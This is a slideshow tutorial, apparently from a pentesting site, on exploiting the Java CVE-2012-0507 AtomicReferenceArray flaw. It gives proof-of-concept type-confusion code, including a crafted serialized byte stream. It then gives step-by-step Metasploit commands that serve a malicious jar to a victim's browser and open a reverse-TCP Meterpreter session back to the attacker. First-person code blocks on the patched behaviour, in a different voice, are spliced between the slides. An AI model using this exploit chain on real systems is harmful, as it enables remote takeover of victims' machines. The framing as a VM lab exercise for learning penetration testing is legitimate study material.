Exploiting java vulnerability [CVE-2012-0507 ]
CVE-2012-0507 is a vulnerability in the JRE: the AtomicReferenceArray class implementation did not properly check whether the array it is given is of the expected Object[] type. A malicious Java application or applet could use this flaw to crash the Java Virtual Machine (JVM) or bypass Java sandbox restrictions.

Published in: Education, Technology

  1. PenTesting Tutorials: www.BreakTheSecurity.com
  2. About CVE-2012-0507. A vulnerability in the JRE: the AtomicReferenceArray class implementation did not properly check whether the array it is given is of the expected Object[] type. The vulnerability was found by Jeroen Frijters. A malicious Java application or applet could use this flaw to crash the Java Virtual Machine (JVM) or bypass Java sandbox restrictions.
  3. The vulnerable constructor:

         public AtomicReferenceArray(E[] array) {
             // clone() keeps the runtime type of the caller's array (e.g. first[]),
             // so the instance's backing store is not guaranteed to be an Object[]
             this.array = array.clone();
         }

  4. Minimal demonstration of the missing check (the slide omitted the "class" keyword, restored here):

         import java.util.concurrent.atomic.*;

         class first {}

         public class violateClass {
             public static void main(String a[]) {
                 Object obj = new first();
                 // the backing array is cloned, so it stays a first[]
                 AtomicReferenceArray r = new AtomicReferenceArray(new first[1]);
                 obj = "Hell";
                 // on an unpatched JRE set() stores the String into the first[]
                 // through Unsafe, with no array-store check
                 r.set(0, obj);
                 // get() hands back the String, so this cast fails with a
                 // ClassCastException; the real type confusion needs a direct
                 // first[] reference to the backing array (see slide 6)
                 first f = (first) r.get(0);
             }
         }

  5. Exploiting. By manually constructing a serialized object graph you can stick any array you want into an AtomicReferenceArray instance and then use the AtomicReferenceArray.set() method to write an arbitrary reference that violates type safety.
  6. Arbitrary reference to violate type safety:

         import java.io.*;
         import java.util.concurrent.atomic.*;

         class Union1 { }
         class Union2 { }

         public class test {
             // hand-built serialization stream: an Object[] holding a Union1[] at index 0
             // and an AtomicReferenceArray at index 1 whose "array" field is a
             // back-reference to that same Union1[]
             static byte[] buf = new byte[] {
                 -84, -19, 0, 5, 117, 114, 0, 19, 91, 76, 106, 97, 118, 97, 46, 108, 97, 110,
                 103, 46, 79, 98, 106, 101, 99, 116, 59, -112, -50, 88, -97, 16, 115, 41, 108,
                 2, 0, 0, 120, 112, 0, 0, 0, 2, 117, 114, 0, 9, 91, 76, 85, 110, 105, 111, 110,
                 49, 59, -2, 44, -108, 17, -120, -74, -27, -1, 2, 0, 0, 120, 112, 0, 0, 0, 1,
                 112, 115, 114, 0, 48, 106, 97, 118, 97, 46, 117, 116, 105, 108, 46, 99, 111,
                 110, 99, 117, 114, 114, 101, 110, 116, 46, 97, 116, 111, 109, 105, 99, 46, 65,
                 116, 111, 109, 105, 99, 82, 101, 102, 101, 114, 101, 110, 99, 101, 65, 114,
                 114, 97, 121, -87, -46, -34, -95, -66, 101, 96, 12, 2, 0, 1, 91, 0, 5, 97,
                 114, 114, 97, 121, 116, 0, 19, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110,
                 103, 47, 79, 98, 106, 101, 99, 116, 59, 120, 112, 113, 0, 126, 0, 3 };

             public static void main(String[] args) throws Throwable {
                 ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(buf));
                 Object[] arr = (Object[]) ois.readObject();
                 Union1[] u1 = (Union1[]) arr[0];
                 AtomicReferenceArray ara = (AtomicReferenceArray) arr[1];
                 // the unchecked store lands in u1 as well, since both share one backing array
                 ara.set(0, new Union2());
                 System.out.println(u1[0]);
             }
         }
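To make clear why the patched JRE is no longer affected by the constructor shown in slide 3 or the deserialization trick in slide 6, here is an added example of my own (not code from the slides and not the JDK's source): a stripped-down model of how the backing array is handled before and after the fix. The class `ArrayCopyDemo` and the helper names are invented for the demonstration; the real `set()` goes through sun.misc.Unsafe, which is not reproduced here, only the array-type difference it depends on.

```java
import java.io.InvalidObjectException;
import java.lang.reflect.Array;
import java.util.Arrays;

// Added example (hypothetical class): models the backing-array handling of
// AtomicReferenceArray before and after the CVE-2012-0507 fix.
public class ArrayCopyDemo {
    static class Cat {}
    static class Dog {}

    // Vulnerable pattern: clone() preserves the runtime type of the caller's
    // array, so a Cat[] passed in stays a Cat[] inside the instance. An
    // Unsafe-based store into it would not be subject to the array-store check.
    static Object[] backingArrayVulnerable(Object[] array) {
        return array.clone();
    }

    // Fixed pattern (JDK 6u31 / 7u3): always copy into a fresh Object[], so no
    // caller-supplied typed array can become the backing store.
    static Object[] backingArrayFixed(Object[] array) {
        return Arrays.copyOf(array, array.length, Object[].class);
    }

    // Model of the guard the patched readObject() applies when an
    // AtomicReferenceArray is deserialized: reject non-arrays and copy any
    // typed array to Object[] before it is installed as the backing store.
    static Object[] validateDeserializedArray(Object a) throws InvalidObjectException {
        if (a == null || !a.getClass().isArray())
            throw new InvalidObjectException("Not array type");
        if (a.getClass() != Object[].class)
            return Arrays.copyOf((Object[]) a, Array.getLength(a), Object[].class);
        return (Object[]) a;
    }

    public static void main(String[] args) throws Exception {
        Cat[] cats = new Cat[1];

        Object[] vuln = backingArrayVulnerable(cats);
        Object[] fixed = backingArrayFixed(cats);
        System.out.println("clone() backing array type:  " + vuln.getClass().getSimpleName());
        System.out.println("copyOf() backing array type: " + fixed.getClass().getSimpleName());

        // An ordinary Java store into the cloned Cat[] is still checked by the
        // JVM and fails with ArrayStoreException; the unpatched set() bypassed
        // exactly this check by writing through Unsafe.
        try {
            vuln[0] = new Dog();
            System.out.println("store into cloned array succeeded (not expected)");
        } catch (ArrayStoreException e) {
            System.out.println("store into cloned Cat[] rejected by the JVM: " + e);
        }

        // Into a genuine Object[] the same store is legal and type-safe, which
        // is why copying to Object[] removes the type confusion entirely.
        fixed[0] = new Dog();
        System.out.println("store into Object[] ok, element is " + fixed[0].getClass().getSimpleName());

        // Deserialization guard: a Cat[] read from a stream is copied to Object[].
        Object[] guarded = validateDeserializedArray(cats);
        System.out.println("guarded backing array type:  " + guarded.getClass().getSimpleName());
    }
}
```

Run it with `javac ArrayCopyDemo.java && java ArrayCopyDemo`. The first two lines show the difference the patch makes (the clone keeps the `Cat[]` runtime type, the copy is an `Object[]`), and the caught `ArrayStoreException` shows the check that a normal Java array store enforces and that the unpatched `set()` skipped.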
  7. Requirements: VirtualBox; a target OS (Windows, ...); a PenTesting distro (BackTrack); JRE 6 (unpatched version).
  8. Preparing the target machine. Start the "Target" machine and install JRE 6. (I have already installed the JRE.)
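Whether a given JRE 6 install is actually unpatched for CVE-2012-0507 is easy to verify directly, rather than from the version string alone. The following added check is my own code (not from the slides or the JDK): it constructs an AtomicReferenceArray from a `String[]` and reads the private `array` field by reflection. A patched JRE copies the argument into an `Object[]`; an unpatched one keeps the caller's `String[]`. The field name `array` is the one the JDK class uses; the class name `Cve20120507Check` is invented. On JDK 9 and later the reflective access needs `--add-opens java.base/java.util.concurrent.atomic=ALL-UNNAMED`.

```java
import java.lang.reflect.Field;
import java.util.concurrent.atomic.AtomicReferenceArray;

// Added example (hypothetical class): reports whether the running JRE still
// shows the CVE-2012-0507 behaviour in AtomicReferenceArray's constructor.
public class Cve20120507Check {

    // Returns true when the constructor copied the caller's array into an
    // Object[] (fix present), false when it kept the String[] (fix absent).
    static boolean backingArrayIsObjectArray() throws Exception {
        // no diamond operator, so this also compiles with a JDK 6 javac
        AtomicReferenceArray<String> ara = new AtomicReferenceArray<String>(new String[1]);
        // "array" is the private backing field of the JDK class
        Field f = AtomicReferenceArray.class.getDeclaredField("array");
        f.setAccessible(true);
        Object backing = f.get(ara);
        return backing.getClass() == Object[].class;
    }

    public static void main(String[] args) throws Exception {
        System.out.println("java.version = " + System.getProperty("java.version"));
        if (backingArrayIsObjectArray()) {
            System.out.println("AtomicReferenceArray copies to Object[]: CVE-2012-0507 constructor fix is present");
        } else {
            System.out.println("AtomicReferenceArray keeps the caller's array type: this JRE looks unpatched");
        }
    }
}
```

Compile and run it with the JRE under test (`javac Cve20120507Check.java && java Cve20120507Check`); on the unpatched JRE 6 the requirements slide calls for, the second message appears, and after applying the vendor update it flips to the first.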
  9. Preparing the attacker machine. Now start BT5. Open the terminal and type "msfupdate". This will update the Metasploit Framework (MSF) with the latest exploits.
  10. Open the terminal and type msfconsole. Now type: use exploit/multi/browser/java_atomicreferencearray. The above command will use the java_atomicreferencearray.rb module for the attack.
  11. Now type "show options" to display the settings available and/or required for this specific module.
  12. Set the server options:
          set SRVPORT 80
          set URIPATH /
          set SRVHOST [Backtrack_ip]
      How to get the IP of BackTrack: open the terminal and type ifconfig; it will display the IP.
  13. Payload. Type "show payloads". This will display the list of payloads available to use. I am going to use the reverse_tcp payload, which gets a reverse TCP connection from the target to our machine. Type: set payload java/meterpreter/reverse_tcp
  14. In order to get the reverse connection, we have to set the BackTrack IP in LHOST. So type the following command: set LHOST [Backtrack_IP]
  15. Are you ready?! Let us
  16. We have set up everything needed for the exploit. So it is time to break into the target machine. Type "exploit" in the msfconsole.
  17. This will start the reverse handler on our machine and wait for anyone who connects to our HTTP server (e.g. http://192.168.56.102). Once the victim connects to our server, it will send a jar that will exploit the CVE-2012-0507 vulnerability.
  18. Victim side. We have set up our exploit. Let us see what happens when our victim opens our URL. Go to the "Target" VM, open Firefox and enter the URL you got from the Metasploit exploit, e.g. http://192.168.56.102. No need to care about the "80" in the URL because it is the default port.
  19. It loads nothing, but in the background BackTrack sends a jar file and exploits the vulnerability. After successful exploitation, it hands control to BackTrack.
  20. Now type "sessions" in the Metasploit console; this will display the list of active sessions (the victim list).
  21. Type "sessions -i 1"; this will open the connection to the session with id 1 and bring you to Meterpreter. Meterpreter will help you to interact with and control the target.
  22. Exploited in the wild. In April 2012, research conducted by Dr.Web determined that more than 600,000 Mac computers were infected with the BackDoor.Flashback botnet. The vulnerability is also included in exploit kits.
  23. I hope this article has given you a good insight into how to use the Metasploit Framework to exploit the Java vulnerability. I hope this will help you to get into the PenTesting world! For more PenTesting tutorials: www.BreakTheSecurity.com
